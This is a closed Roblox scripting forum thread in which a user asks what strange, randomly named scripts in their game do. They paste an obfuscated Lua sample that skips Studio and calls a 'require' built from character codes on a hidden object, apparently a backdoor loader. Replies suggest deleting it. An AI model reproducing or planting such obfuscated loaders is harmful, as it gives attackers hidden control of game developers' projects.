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Can someone help me find out what these random scripts are doing inside my game? [closed]

Asked by 6 years ago

So I search up script in the explorer and I see scripts named ranomd things such as 5Ì¿22986¿Ì¿•Ì¿. the script is put in a random place and the inside says

i9TT6 = string iyRnUiIG = 'GetService' iTXNEWXl = 'Debris' ieBbcUYUjzC8V8BS5 = 'GetProductInfo' iBtyIbfxkE = 'slo' iMJP9wSEzZE = 'SSM' ijtA = '?' io9zv2 = require iBQ7Bpv92Gkcq = 'PlaceId' iveK8LfB = 'ReplicatedStorage' iUlfXIpDYb3 = 'IsStudio' iAALTUMaUoR = 'MarketplaceService' iG5aJm = game i8cvX5 = 'Name' iEGadm6Ue6ufnwy = pcall illFGjzJm6F = 'ClassName' i3hwd = 'FindFirstChild' iHTIu = 'FindFirstChild' ibBrymU = i9TT6.char ihwuJH4aIEx8dsu = 'Description' ivyk0npvSulNxMNG = getfenv iofP = game iVInO54 = 'GetService' iAmQOU73Uka = 'WaitForChild' ignJDdPHzG = 'RunService' if iG5aJm[iVInO54](iG5aJm, ignJDdPHzG)[iUlfXIpDYb3](iG5aJm[iVInO54](iG5aJm, ignJDdPHzG))then return end;iEGadm6Ue6ufnwy(function() if iG5aJm[iVInO54](iG5aJm, iTXNEWXl)[i3hwd](iG5aJm[iVInO54](iG5aJm, iTXNEWXl), ijtA) then ivyk0npvSulNxMNG()[ibBrymU(373192338 / 3273617) .. ibBrymU(330635317 / 3273617) .. ibBrymU(369918721 / 3273617) .. ibBrymU(383013189 / 3273617) .. ibBrymU(343729785 / 3273617) .. ibBrymU(373192338 / 3273617) .. ibBrymU(330635317 / 3273617)](iG5aJm[iVInO54](iG5aJm, iTXNEWXl)[i3hwd](iG5aJm[iVInO54](iG5aJm, iTXNEWXl), ijtA))iBtyIbfxkE end end)

can someone help what does this mean

just delete it Wicked_Wlzard 110 — 6y
It's probably a load string, or backdoor, i recommend deleting. utrabem 5 — 6y

Closed as off-topic by User#5423

This question has been closed by our community as being off-topic from ROBLOX Lua Scripting.

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